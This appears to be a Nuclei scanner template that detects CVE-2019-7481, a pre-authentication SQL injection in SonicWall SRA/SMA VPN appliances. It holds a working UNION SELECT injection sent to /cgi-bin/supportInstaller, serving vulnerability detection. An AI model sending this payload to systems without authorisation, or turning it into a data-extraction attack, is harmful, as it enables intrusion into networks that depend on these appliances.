id: CVE-2019-7481 info: name: SonicWall SRA 4600 VPN - SQL Injection author: _darrenmartyn severity: high description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service. remediation: | Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability. reference: - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/ - https://nvd.nist.gov/vuln/detail/CVE-2019-7481 - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0016 - https://github.com/Ostorlab/KEV - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-7481 cwe-id: CWE-89 epss-score: 0.93107 epss-percentile: 0.99046 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonicwall product: sma_100_firmware tags: cve,cve2019,sonicwall,sqli,kev http: - raw: - | POST /cgi-bin/supportInstaller HTTP/1.1 Host: {{Hostname}} Accept-Encoding: identity User-Agent: MSIE Content-Type: application/x-www-form-urlencoded fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- matchers: - type: word part: body words: - "4220397236" # digest: 4b0a00483046022100a4ddce6dd58e54802f8b7e00fbf984b516fe94d887961627d565a2d5c9540f91022100af1b9cde6236c520689d2a910df99af3210efc81fd5fb4e0e4946f49fbea8500:922c64590222798bb761d5b6d8e72950